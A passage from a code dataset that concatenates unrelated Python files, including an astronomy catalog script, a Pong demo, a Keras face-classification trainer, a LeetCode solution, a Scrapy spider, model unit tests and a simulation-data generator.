add_conflag(catfile,confile,outfile,addprob=False):\n\n    #catfile = original catalog\n    #confile = file containing confusion flag\n    \n    dbhdu = fits.open(catfile)\n    chdu = fits.open(confile)\n\n    #extract data tables\n    db = dbhdu[1].data\n    conf = chdu[1].data\n\n    #add new column to db which will contain the confusion flag\n    new_col = fits.ColDefs([fits.Column(name='conflag',format='I',array=np.zeros(len(db)))])\n    newdbhdu = fits.BinTableHDU.from_columns(db.columns + new_col)\n    db=newdbhdu.data\n\n\n    if addprob==True:\n        new_col = fits.ColDefs([fits.Column(name='conf_prob',format='F',array=np.zeros(len(db)))])\n        newdbhdu = fits.BinTableHDU.from_columns(db.columns + new_col)\n        db=newdbhdu.data \n\n    #add confusion flag to db. 
First isolate unique entries (duplicates will have the same confusion flag) and let's just separate out the ones with conflag==1 (we'll only match these to save time)\n \n uniq_ind = (np.unique(conf['hiname'], return_index=True))[1]\n# uniq_ind = uniques[1]\n conf = conf[uniq_ind]\n sel=conf['conflag']==1\n conf=conf[sel]\n\n for name in conf['hiname']:\n sel = (db['mangaid'] == name)\n db['conflag'][sel]=1\n \n if addprob==True:\n for name,cp in zip(conf['hiname'],conf['conf_prob']):\n sel = (db['mangaid'] == name)\n #print(np.sum(sel))\n db['conf_prob'][sel]=cp\n \n newdbhdu.writeto(outfile,overwrite=True) \n \narguments = sys.argv\nif len(arguments) < 3:\n print('error: please supply input hi-manga catalog and optical matches file')\n sys.exit()\n\ncatfile = arguments[1]\nconfile = arguments[2]\nif len(arguments)>3:\n outfile = arguments[3]\nelse:\n outfile = arguments[1]\n \n#catfile = 'mangahi_dr2_062321_gbtonly.fits'\n#confile = 'mangahi_dr2_062321_gbtonly_nsamatch_1.5beam_withprob.fits'\n#outfile = 'mangahi_dr2_062321_gbtonly_withconf.fits'\n\nout=add_conflag(catfile,confile,outfile,addprob=True)\n","sub_path":"database/add_conflag_cl.py","file_name":"add_conflag_cl.py","file_ext":"py","file_size_in_byte":2315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"189109666","text":"from ezpg import *\n\n#paddle class\nclass paddle():\n def __init__(self, x, y):#initiation function\n self.height = 200\n self.width = 20\n self.x = x\n self.y = y-self.height\n\n def draw(self):#for displaying stuff to the screen\n rect(self.x, self.y, self.width, self.height)\n \n def move(self, speed):#for moving the paddles\n self.y += speed\n self.y = constrain(self.y, 0, height()-self.height)\n\n#ball class\nclass Ball():\n def __init__(self):#initiation function\n self.minspeed = 0.2\n self.maxspeed = 1\n self.x = width()/2\n self.y = height()/2\n self.r = 10\n self.vx = 0\n self.vy = 0\n\n if random(0, 1000) < 500:\n self.vx= random(self.minspeed, self.maxspeed)\n else:\n self.vx = random(-self.maxspeed, -self.minspeed)\n\n if random(0, 1000) < 500:\n self.vy = random(self.minspeed, self.maxspeed)\n else:\n self.vy = random(-self.maxspeed, -self.minspeed)\n\n def draw(self):#draw function\n rect(self.x, self.y, 2*self.r, 2*self.r)\n \n def move(self):\n self.x += self.vx\n self.y += self.vy\n \n #vertical bouncing\n if self.y+self.r > height():\n self.vy *= -1\n elif self.y-self.r < 0:\n self.vy *= -1\n\n#main sketch class\nclass ponggame(sketch):\n p1 = None#paddle object\n p2 = None#paddle object\n b = None#ball object\n\n def setup(self):\n global p1#this is needed so you\n global p2#are able to set this to a value\n global b\n\n createCanvas(800, 600)#create the canvas\n rename(\"pong\")\n p1 = paddle(10, height()/2)#create p1 object\n p2 = paddle(width()-30, height()/2)#create p2 object\n b = Ball()\n\n def draw(self):\n background(0, 0, 0)#set background\n p1.draw()#draw player 1's paddle\n p2.draw()#draw player 2's paddle\n b.draw()#draw the ball\n b.move()#move the ball\n\n #handle movement\n if isPressed(\"Q\"):\n p1.move(-1)\n if isPressed(\"A\"):\n p1.move(1)\n if isPressed(\"up\"):\n p2.move(-1)\n if isPressed(\"down\"):\n p2.move(1)\n\nstart(ponggame())\n","sub_path":"demos/demo4.py","file_name":"demo4.py","file_ext":"py","file_size_in_byte":2263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"126459632","text":"import argparse\nimport os\nimport pickle\n\nfrom keras.applications 
import MobileNetV2\nfrom keras.callbacks import LearningRateScheduler, ModelCheckpoint\nfrom keras.layers import Conv2D, Dense, Dropout, Flatten, Input\nfrom keras.models import Model\nfrom keras.optimizers import Adam\nfrom keras.preprocessing.image import ImageDataGenerator\n\n\ndef step_decay(epoch):\n x = 1e-3\n if epoch >= 60:\n x = 1e-4\n if epoch >= 100:\n x = 1e-5\n return x\n\n\ndef net(image_size, pretrained_model, alpha=1.0):\n inputs = Input(shape=(image_size, image_size, 3))\n model_mobilenet = MobileNetV2(input_shape=(image_size, image_size, 3),\n alpha=alpha,\n include_top=False,\n weights=pretrained_model,\n input_tensor=None,\n pooling=None)\n x = model_mobilenet(inputs)\n conv_1 = Conv2D(128, (1, 1), activation='relu')(x)\n flat_1 = Flatten()(conv_1)\n drop_1 = Dropout(0.5)(flat_1)\n dence_1 = Dense(128, activation='relu', name='feat_a')(drop_1)\n dence_2 = Dense(32, activation='relu', name='feat_b')(dence_1)\n outputs = Dense(3, activation=\"softmax\")(dence_2)\n model = Model(inputs=inputs, outputs=outputs)\n\n return model\n\n\ndef train(arguments):\n if not os.path.exists(arguments.model_output_directory):\n os.makedirs(arguments.model_output_directory)\n\n train_data_generator = ImageDataGenerator(\n rescale=1. / 255,\n horizontal_flip=arguments.horizontal_flip,\n rotation_range=arguments.rotation_range,\n brightness_range=arguments.brightness_range)\n\n validation_data_generator = ImageDataGenerator(rescale=1. / 255)\n\n train_generator = train_data_generator.flow_from_directory(\n arguments.train_data_directory,\n target_size=(arguments.image_size, arguments.image_size),\n batch_size=arguments.batch_size,\n classes=arguments.classes,\n color_mode='rgb',\n class_mode='categorical')\n\n validation_generator = validation_data_generator.flow_from_directory(\n arguments.validation_data_directory,\n target_size=(arguments.image_size, arguments.image_size),\n batch_size=arguments.batch_size,\n classes=arguments.classes,\n color_mode='rgb',\n class_mode='categorical')\n\n train_num = train_generator.samples\n validation_num = validation_generator.samples\n\n model = net(arguments.image_size, arguments.pretrained_model)\n\n model.summary()\n\n model.compile(optimizer=Adam(lr=1e-3),\n loss='categorical_crossentropy',\n metrics=['accuracy'])\n\n lr_decay = LearningRateScheduler(step_decay)\n\n callbacks = \\\n [ModelCheckpoint(arguments.model_output_directory + '/weights.{epoch:02d}-{val_accuracy:.2f}-{val_loss:.2f}.h5',\n monitor='val_loss', verbose=1, save_best_only=True, save_weights_only=False, mode='auto',\n period=1), lr_decay]\n\n history = model.fit_generator(\n train_generator,\n steps_per_epoch=train_num // arguments.batch_size,\n validation_data=validation_generator,\n validation_steps=validation_num // arguments.batch_size,\n epochs=arguments.epochs,\n callbacks=callbacks,\n verbose=1,\n shuffle=True)\n\n model.save(arguments.model_output_directory + '/final_model.h5')\n\n with open(arguments.model_output_directory + '/learning_history.pkl', 'wb') as f:\n pickle.dump(history.history, f)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Train face network')\n parser.add_argument('--train_data_directory',\n type=str,\n default='',\n help='Input train data directory')\n parser.add_argument('--validation_data_directory',\n type=str,\n default='',\n help='Input validation data directory')\n parser.add_argument('--image_size',\n type=int,\n default=128,\n help='Model input image size')\n parser.add_argument('--horizontal_flip',\n 
action='store_true',\n                        help='Horizontal flip')\n    parser.add_argument('--rotation_range',\n                        type=int,\n                        default=30,\n                        help='Rotation range')\n    parser.add_argument('--brightness_range',\n                        type=float,\n                        default=[0.6, 1.4],\n                        help='Brightness range')\n    parser.add_argument('--batch_size',\n                        type=int,\n                        default=16,\n                        help='Batch size')\n    parser.add_argument('--classes',\n                        type=str,\n                        default=['chinese', 'japanese', 'korean'],\n                        help='Target classes to recognize')\n    parser.add_argument('--pretrained_model',\n                        type=str,\n                        default=None,\n                        help='Pretrained model')\n    parser.add_argument('--epochs', type=int, default=120, help='Epochs')\n    parser.add_argument('--model_output_directory',\n                        type=str,\n                        default=\"output\",\n                        help='Name of the directory to output models')\n    arguments = parser.parse_args()\n\n    assert os.path.isdir(\n        arguments.train_data_directory), 'Input train data directory'\n    assert os.path.isdir(\n        arguments.validation_data_directory), 'Input validation data directory'\n\n    train(arguments)\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"179276801","text":"\"\"\"\nGiven an array of n positive integers and a positive integer s, find the minimal length of a contiguous subarray whose sum is >= s. If no such subarray exists, return 0.\n\nExample:\n\nInput: s = 7, nums = [2,3,1,2,4,3]\nOutput: 2\nExplanation: the subarray [4,3] is the shortest contiguous subarray satisfying the condition.\n\n\nFollow-up:\n\nIf you have worked out the O(n) solution, try to solve it in O(n log n) time.\n\nSource: LeetCode\nLink: https://leetcode-cn.com/problems/minimum-size-subarray-sum\nCopyright belongs to LeetCode; contact them for authorization before commercial reprints, and cite the source for non-commercial reprints.\n\"\"\"\n\"\"\"\nIdea:\nnums1=[2, 5, 6, 8, 12, 15]\nnums2=[-5, -2, -1, 1, 5, 8]\nFind the minimal difference between indices.\nHow to compare them? Rather involved.\nIs there a simpler way?\nThe method below is the two-pointer / sliding-window solution.\n\"\"\"\n\n\nclass Solution:\n    def minSubArrayLen(self, s: int, nums: [int]) -> int:\n        if not nums:\n            return 0\n        left = 0\n        cur = 0\n        res = float(\"inf\")\n        for right in range(len(nums)):\n            cur += nums[right]\n            while cur >= s:\n                res = min(res, right - left + 1)\n                cur -= nums[left]\n                left += 1\n        return res if res != float(\"inf\") else 0\n\n\nif __name__ == '__main__':\n    d = Solution()\n    print(d.minSubArrayLen(7, [2, 3, 1, 3, 4, 3]))\n","sub_path":"minSubArrayLen.py","file_name":"minSubArrayLen.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"431745872","text":"from cloudrail.knowledge.context.azure.resources.service_bus.azure_service_bus_namespace import AzureServiceBusNamespace, ServiceBusNamespaceSku\nfrom cloudrail.knowledge.context.azure.resources_builders.scanner.base_azure_scanner_builder import BaseAzureScannerBuilder\n\n\nclass ServiceBusNamespaceBuilder(BaseAzureScannerBuilder):\n\n    def get_file_name(self) -> str:\n        return 'list-servicebus-namespaces.json'\n\n    def do_build(self, attributes: dict) -> AzureServiceBusNamespace:\n        properties = attributes['properties']\n        sku_attributes = attributes['sku']\n        return AzureServiceBusNamespace(name=attributes['name'],\n                                        sku=ServiceBusNamespaceSku(sku_attributes['name']),\n                                        capacity=sku_attributes.get('capacity', 0),\n                                        zone_redundant=properties.get('zoneRedundant', False))\n","sub_path":"cloudrail/knowledge/context/azure/resources_builders/scanner/service_bus_namespace_builder.py","file_name":"service_bus_namespace_builder.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"237242744","text":"# coding: utf-8\r\nimport re\r\nimport 
sys\r\nreload(sys)\r\nsys.setdefaultencoding('utf-8')\r\n\r\n# check whether a character is a Chinese character or Chinese punctuation\r\ndef is_chinese_charactar(uchar):\r\n    delCStr = '”“《》(),。;?——¥!{}【】' \r\n\r\n    if (uchar >= u'\\u4e00' and uchar <= u'\\u9fa5') or delCStr.find(uchar) >= 0:\r\n        return True\r\n    else:\r\n        return False\r\n\r\n\r\n# check whether a string contains Chinese \r\n'''\r\nTo test for Chinese in Python the text must match u'[\\u4e00-\\u9fa5]+'.\r\nNote that when the regex pattern uses unicode, the string being\r\nmatched must also be converted to unicode, otherwise it will never match.\r\n'''\r\n''' \r\ndef has_chinese_charactar(content):\r\n    iconvcontent = unicode(content)\r\n    zhPattern = re.compile(u'[\\u4e00-\\u9fa5]+')\r\n    match = zhPattern.search(iconvcontent)\r\n    res = False\r\n    if match:\r\n        res = True\r\n    return res\r\n'''\r\n\r\nf = open(\"original.txt\")\r\nline = f.readline()\r\ncount = 0\r\ndict = {}\r\nwhile line:\r\n    # print line, \r\n    # print(line, end = '')   # use in Python 3\r\n    line = unicode(line, 'utf-8').strip()\r\n    l_zh = -1\r\n    if len(line):\r\n        count += 1\r\n        for i in range(len(line)):\r\n            if is_chinese_charactar(line[i]):\r\n                l_zh = i\r\n        if l_zh == len(line)-1:\r\n            # print line.split(' ')[-1]\r\n            # print line[0: len(line)-len(line.split(' ')[-1])-1]\r\n            key = line[0: len(line)-len(line.split(' ')[-1])-1]\r\n            value = line.split(' ')[-1]\r\n\r\n        else: \r\n            # print line.split(' ')[0]\r\n            # print line[len(line.split(' ')[0])+1:]\r\n            key = line[len(line.split(' ')[0])+1:]\r\n            value = line.split(' ')[0]\r\n        \r\n        dict[key] = value\r\n\r\n    line = f.readline()\r\n\r\nf.close()\r\n\r\noutput = open('target.txt', 'w')\r\noutput.write('|:-----|:-----|\\n')\r\nfor k in sorted(dict.keys()):\r\n    # print k, \":\", dict[k]\r\n    output.write('|')\r\n    output.write(k)\r\n    output.write('|')\r\n    output.write(dict[k])\r\n    output.write('|\\n')\r\n    output.flush()\r\n\r\noutput.close()\r\n","sub_path":"python/20150116/txt.py","file_name":"txt.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"326351678","text":"import unittest\nimport numpy as np\nfrom ..gmrf import GMRF\nfrom numpy.linalg import inv\nfrom scipy.stats import norm, multivariate_normal\n\nclass TestLogPdf(unittest.TestCase):\n\n    def test_one_dim(self):\n        \"\"\" Test log pdf for one dimensional data \"\"\"\n        x = np.array([1])\n        mean = np.array([2])\n        Q = np.array([[ 1 / 25 ]])\n\n        gmrf = GMRF()\n        self.assertAlmostEqual(gmrf._logpdf(x, mean, Q),\n                               norm.logpdf(1, 2, 5))\n\n    def test_multi_dim(self):\n        \"\"\" Test log pdf for multi dimensional data \"\"\"\n        x = np.array([1, 2, 1.7])\n        mean = np.array([2, 1, 5])\n        Q = np.array([[1.2, 0.7, -0.4],\n                      [0.7, 0.68, 0.01],\n                      [-0.4, 0.01, 1]])\n\n        gmrf = GMRF()\n        self.assertAlmostEqual(gmrf._logpdf(x, mean, Q),\n                               multivariate_normal.logpdf(x, mean, inv(Q)))\n\nclass TestBic(unittest.TestCase):\n\n    def test_simple_chain(self):\n        \"\"\" Test BIC for simple chain A - B - C\"\"\"\n        Q = np.array([[1, -0.5, 0], [-0.5, 1.25, -0.5], [0, -0.5, 1]])\n\n        X = np.array([[-0.5, -1.5, 0.4],\n                      [3.9, -1.7, -1.1],\n                      [7.8, -3.2, 1.3],\n                      [2.0, -2.9, 3.2],\n                      [3.4, -8, 1.3]])\n\n        mean = np.mean(X, axis=0)\n\n        gmrf = GMRF()\n        gmrf.precision_ = Q\n        gmrf.mean_ = np.mean(X, axis=0)\n        bic, converged = gmrf.bic(X, gamma=0)\n\n        self.assertTrue(converged)\n        self.assertAlmostEqual(bic, -2 * np.sum(multivariate_normal.logpdf(X, mean, inv(Q))) + 5 * np.log(5))\n","sub_path":"lib/gaussian/tests/test_metrics.py","file_name":"test_metrics.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} 
+{"seq_id":"214801790","text":"# -*- coding: utf-8 -*-\n\"\"\" Probe system performance\n Author: Kai JIN\n Update: 17/11/22\n\"\"\"\nimport sys\nimport tensorflow as tf\nfrom tensorflow import profiler\n\n\nclass Profiler():\n \"\"\" The class to manage the probe tools, offering:\n 1) network structure (parameter number)\n 2) FLOPs\n 3) time and memory analyzeing\n \"\"\"\n\n def __init__(self):\n pass\n\n @staticmethod\n def parameters():\n \"\"\" parameters\n \"\"\"\n param_stats = profiler.profile(\n graph=tf.get_default_graph(),\n cmd='scope',\n options=profiler.ProfileOptionBuilder.trainable_variables_parameter())\n sys.stdout.write('total params: %d\\n' % param_stats.total_parameters)\n\n @staticmethod\n def flops():\n \"\"\" flops\n \"\"\"\n param_stats = tf.profiler.profile(\n graph=tf.get_default_graph(),\n cmd='scope',\n options=tf.profiler.ProfileOptionBuilder.float_operation())\n sys.stdout.write('total flops: %d\\n' % param_stats.total_float_ops)\n\n @staticmethod\n def time_memory(path, sess, train_op):\n \"\"\" time_memory\n \"\"\"\n builder = tf.profiler.ProfileOptionBuilder\n opts = builder(builder.time_and_memory()).order_by('micros').build()\n with tf.contrib.tfprof.ProfileContext(path,\n trace_steps=range(10, 20),\n dump_steps=[20]) as pctx:\n pctx.trace_next_step()\n pctx.dump_next_step()\n sess.run(train_op)\n pctx.profiler.profile_operations(options=opts)\n","sub_path":"core/utils/profiler.py","file_name":"profiler.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"170225953","text":"#!/usr/bin/env python\n\n'''\nA simple Python wrapper for the bh_tsne binary that makes it easier to use it\nfor TSV files in a pipeline without any shell script trickery.\n\nNote: The script does some minimal sanity checking of the input, but don't\n expect it to cover all cases. After all, it is a just a wrapper.\n\nExample:\n\n > echo -e '1.0\\t0.0\\n0.0\\t1.0' | ./bhtsne.py -d 2 -p 0.1\n -2458.83181442 -6525.87718385\n 2458.83181442 6525.87718385\n\nThe output will not be normalised, maybe the below one-liner is of interest?:\n\n python -c 'import numpy; from sys import stdin, stdout;\n d = numpy.loadtxt(stdin); d -= d.min(axis=0); d /= d.max(axis=0);\n numpy.savetxt(stdout, d, fmt=\"%.8f\", delimiter=\"\\t\")'\n\nAuthors: Pontus Stenetorp \n Philippe Remy \nVersion: 2016-03-08\n'''\n\n# Copyright (c) 2013, Pontus Stenetorp \n#\n# Permission to use, copy, modify, and/or distribute this software for any\n# purpose with or without fee is hereby granted, provided that the above\n# copyright notice and this permission notice appear in all copies.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\" AND THE AUTHOR DISCLAIMS ALL WARRANTIES\n# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF\n# MERCHANTABILITY AND FITNESS. 
IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR\n# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES\n# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN\n# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF\n# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.\n\nfrom argparse import ArgumentParser, FileType\nfrom os.path import abspath, dirname, isfile, join as path_join\nfrom shutil import rmtree\nfrom struct import calcsize, pack, unpack\nfrom subprocess import Popen\nfrom sys import stderr, stdin, stdout\nfrom tempfile import mkdtemp\nfrom platform import system\nfrom os import devnull\nimport numpy as np\nimport os, sys\nimport io\n\n# Default hyper-parameter values from van der Maaten (2014)\n# https://lvdmaaten.github.io/publications/papers/JMLR_2014.pdf (Experimental Setup, page 13)\nDEFAULT_NO_DIMS = 2\nINITIAL_DIMENSIONS = 50\nDEFAULT_PERPLEXITY = 50\nDEFAULT_THETA = 0.5\nEMPTY_SEED = -1\nDEFAULT_USE_PCA = True\nDEFAULT_MAX_ITERATIONS = 1000\n\n###\n\ndef argparse():\n argparse = ArgumentParser('bh_tsne Python wrapper')\n argparse.add_argument('-d', '--no_dims', type=int,\n default=DEFAULT_NO_DIMS)\n argparse.add_argument('-p', '--perplexity', type=float,\n default=DEFAULT_PERPLEXITY)\n # 0.0 for theta is equivalent to vanilla t-SNE\n argparse.add_argument('-t', '--theta', type=float, default=DEFAULT_THETA)\n argparse.add_argument('-r', '--randseed', type=int, default=EMPTY_SEED)\n argparse.add_argument('-n', '--initial_dims', type=int, default=INITIAL_DIMENSIONS)\n argparse.add_argument('-v', '--verbose', action='store_true')\n argparse.add_argument('-i', '--input', type=FileType('r'), default=stdin)\n argparse.add_argument('-o', '--output', type=FileType('w'),\n default=stdout)\n argparse.add_argument('--use_pca', action='store_true')\n argparse.add_argument('--no_pca', dest='use_pca', action='store_false')\n argparse.set_defaults(use_pca=DEFAULT_USE_PCA)\n argparse.add_argument('-m', '--max_iter', type=int, default=DEFAULT_MAX_ITERATIONS)\n return argparse\n\n\ndef _read_unpack(fmt, fh):\n return unpack(fmt, fh.read(calcsize(fmt)))\n\n\ndef _is_filelike_object(f):\n try:\n return isinstance(f, (file, io.IOBase))\n except NameError:\n # 'file' is not a class in python3\n return isinstance(f, io.IOBase)\n\n\ndef init_bh_tsne(samples, workdir, no_dims=DEFAULT_NO_DIMS, initial_dims=INITIAL_DIMENSIONS, perplexity=DEFAULT_PERPLEXITY,\n theta=DEFAULT_THETA, randseed=EMPTY_SEED, verbose=False, use_pca=DEFAULT_USE_PCA, max_iter=DEFAULT_MAX_ITERATIONS):\n\n if use_pca:\n samples = samples - np.mean(samples, axis=0)\n cov_x = np.dot(np.transpose(samples), samples)\n [eig_val, eig_vec] = np.linalg.eig(cov_x)\n\n # sorting the eigen-values in the descending order\n eig_vec = eig_vec[:, eig_val.argsort()[::-1]]\n\n if initial_dims > len(eig_vec):\n initial_dims = len(eig_vec)\n\n # truncating the eigen-vectors matrix to keep the most important vectors\n eig_vec = np.real(eig_vec[:, :initial_dims])\n samples = np.dot(samples, eig_vec)\n\n # Assume that the dimensionality of the first sample is representative for\n # the whole batch\n sample_dim = len(samples[0])\n sample_count = len(samples)\n\n # Note: The binary format used by bh_tsne is roughly the same as for\n # vanilla tsne\n with open(path_join(workdir, 'data.dat'), 'wb') as data_file:\n # Write the bh_tsne header\n data_file.write(pack('iiddii', sample_count, sample_dim, theta, perplexity, no_dims, max_iter))\n # Then write the data\n for sample in samples:\n 
data_file.write(pack('{}d'.format(len(sample)), *sample))\n        # Write random seed if specified\n        if randseed != EMPTY_SEED:\n            data_file.write(pack('i', randseed))\n\ndef load_data(input_file):\n    # Read the data, using numpy's good judgement\n    return np.loadtxt(input_file)\n\n\n","sub_path":"wrapper/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":5351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"563453651","text":"#!/usr/bin/python3\nimport math\n\ndef odleglosc(x1, y1, x2, y2):\n    a = abs(x1 - x2)\n    b = abs(y1 - y2)\n\n    return a*a + b*b\n\n\n\n\ndef main():\n    c = input().split()\n    n = int(c[0])\n    m = int(c[1])\n    x = int(c[2])\n    y = int(c[3])\n    r = int(c[4])\n\n    for i in range(1, n+1):\n        for j in range(1, m+1):\n            if odleglosc(x, y, i, j) <= r*r:\n                print('#', end='')\n            else:\n                print('.', end='')\n        print()    \n\n\nmain()","sub_path":"2020/05/16/kolo.py","file_name":"kolo.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"407987799","text":"import pyowm\r\n\r\nowm = pyowm.OWM('e2ef41348ab4f86bf88ed303bc16b2dc')\r\nmgr = owm.weather_manager()\r\n\r\nwhere = input('Where should I look up the weather?: ') # comment for task-1\r\n\r\nobservation = mgr.weather_at_place(where)\r\nw = observation.weather\r\nprint(w)\r\n","sub_path":"weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"53183092","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.spiders import CrawlSpider, Rule\nfrom chian.items import ChianItem\nfrom scrapy_redis.spiders import RedisCrawlSpider\n\nclass ChinaspiderSpider(RedisCrawlSpider):\n    name = 'chinaspider'\n    allowed_domains = ['china.com']\n    redis_key = 'zhwSpider:start_urls'\n    #start_urls = ['https://travel.china.com/hotspot/']\n\n    rules = (\n        Rule(LinkExtractor(allow=r'h.*?index_\\d+.html'), callback='parse_item', follow=True),\n    )\n\n    def parse_item(self, response):\n\n        item = ChianItem()\n        article_list = response.xpath('//div[@class=\\"m_Con\\"]')\n        #print(article_list)\n        for i in article_list:\n            item['title'] = i.xpath('.//div[2]/h2/a/text()').extract()\n            item['content'] = i.xpath('.//div[2]/div/text()').extract()\n            item['time'] = i.xpath('.//div[2]/p/span/text()').extract()\n            print(item['title'])\n            print(item['content'])\n            print(item['time'])\n            yield item","sub_path":"爬虫10/爬虫/chian/chian/spiders/chinaspider.py","file_name":"chinaspider.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"645331257","text":"import numpy as np\nimport csv\nfrom copy import deepcopy\nfrom bellman_utilities import BellmanUtil\nfrom scipy.stats import norm\n\n\nclass DataGen:\n    def __init__(self, model_params, tot_samples=70):\n        curr_params = deepcopy(model_params)\n        bellutil = BellmanUtil(**curr_params)\n        curr_params['rho'] = bellutil.rho\n        curr_params['decisions'] = bellutil.decisions\n        decisions = bellutil.decisions\n\n        for i, column in enumerate(decisions.T):\n            try:\n                upperbound = (column == 2).nonzero()[0][0]\n                lowerbound = (column == 1).nonzero()[0][-1]\n            except IndexError:\n                raise ValueError('Non-existent bounds at some timestep')\n            column[upperbound:] = 2\n            column[:lowerbound] = 1\n            decisions[:, i] = column\n\n        condN = tot_samples // 2\n        dt = 
model_params['dt']\n T = model_params['T']\n t_d = model_params['t_delay']\n t_max = model_params['t_max'] - t_d\n maxind = int(t_max / dt) - 1\n t_values = np.arange(0, T, dt)\n g_values = model_params['g_values']\n\n ev_values = np.zeros((2, tot_samples // 2, t_values.shape[0]))\n ev_values[0, :, :] = np.random.normal(loc=0, scale=model_params['sigma'][0],\n size=ev_values.shape[1:])\n ev_values[1, :, :] = np.random.normal(loc=1, scale=model_params['sigma'][1],\n size=ev_values.shape[1:])\n\n g_traces = np.zeros_like(ev_values)\n for C in (0, 1):\n for sample in range(condN):\n for samplen in range(t_values.shape[0]):\n g_traces[C, sample, samplen] = self.g_t(ev_values[C, sample, :samplen + 1],\n model_params['mu'],\n model_params['sigma'])\n binned_traces = np.digitize(g_traces, g_values, right=True)\n binned_traces[binned_traces == g_values.shape[0]] = g_values.shape[0] - 1\n\n response_times = np.zeros(ev_values.shape[:-1])\n response_idents = np.zeros(ev_values.shape[:-1])\n for C in (0, 1):\n for sample in range(condN):\n i = 0\n while i <= maxind:\n currdec = decisions[binned_traces[C, sample, i], i]\n if currdec == 1:\n response_times[C, sample] = t_values[i] + t_d\n response_idents[C, sample] = 0\n break\n elif currdec == 2:\n response_times[C, sample] = t_values[i] + t_d\n response_idents[C, sample] = 1\n break\n elif (currdec == 0) and (i == maxind):\n response_times[C, sample] = t_max + t_d\n response_idents[C, sample] = 2\n i += 1\n\n self.response_times = response_times\n self.response_idents = response_idents\n self.model_params = curr_params\n\n def g_t(self, x, mu, sigma, prior=0.5):\n presprobs = norm.pdf(x, loc=mu[1], scale=sigma[1])\n absprobs = norm.pdf(x, loc=mu[0], scale=sigma[0])\n denom = np.product(presprobs) * prior + np.product(absprobs) * prior\n return np.product(presprobs) * prior / denom\n\n def save_csv(self, savepath):\n with open(savepath, 'r') as fr:\n existing = fr.read(6) == 'target'\n\n with open(savepath, 'a') as fw:\n writer = csv.writer(fw)\n if not existing:\n writer.writerow(['target', 'setsize', 'dyn', 'resp', 'rt', 'sub', 'exp', 'correct'])\n curr_N = self.model_params['N']\n abs_resp = zip(self.response_idents[0, :], self.response_times[0, :])\n pres_resp = zip(self.response_idents[1, :], self.response_times[1, :])\n # First write all responses for target absent simulations\n for response, rt in abs_resp:\n correct = response == 0\n if response == 0:\n adjusted_response = 2\n elif response == 1:\n adjusted_response = 1\n elif response == 2:\n adjusted_response = -1\n writer.writerow(['Absent', curr_N, 'Dynamic',\n adjusted_response, \"{:.7f}\".format(rt), 666, 1, correct])\n # Then write all responses for target present sims\n for response, rt in pres_resp:\n correct = response == 1\n if response == 0:\n adjusted_response = 2\n elif response == 1:\n adjusted_response = 1\n elif response == 2:\n adjusted_response = -1\n writer.writerow(['Present', curr_N, 'Dynamic',\n adjusted_response, \"{:.7f}\".format(rt), 666, 1, correct])\n","sub_path":"codes/synth_data.py","file_name":"synth_data.py","file_ext":"py","file_size_in_byte":5016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"169322242","text":"from json import loads\nfrom subprocess import check_output\n\n\ndef run_jsdoc(app):\n \"\"\"Run JSDoc across a whole codebase, and squirrel away its results.\"\"\"\n # JSDoc defaults to utf8-encoded output.\n doclets = loads(check_output(['jsdoc', app.config.js_source_path, '-r', 
'-X']).decode('utf8'))\n app._sphinxjs_jsdoc_output = dict((d['longname'], d) for d in doclets\n if d.get('comment')\n and not d.get('undocumented'))\n # 2 doclets are made for classes, and they are largely redundant: one for\n # the class itself and another for the constructor. However, the\n # constructor one gets merged into the class one and is intentionally\n # marked as undocumented, even if it isn't. See\n # https://github.com/jsdoc3/jsdoc/issues/1129.\n","sub_path":"sphinx_js/jsdoc.py","file_name":"jsdoc.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"523405526","text":"import numpy as np\nfrom sklearn.cluster import KMeans\nimport math\nimport matplotlib.pyplot as plt\n\n\ndef distance(p1, p2):\n \"\"\" Get the distance between two points \"\"\"\n dist = np.sqrt(np.power(p1 - p2, 2).sum())\n return dist\n\ndef get_dist_matrix(data):\n \"\"\"\n Get the distance matrix\n input: raw data\n return: distance matrix\n \"\"\"\n n = len(data) # dimension: NxD\n # 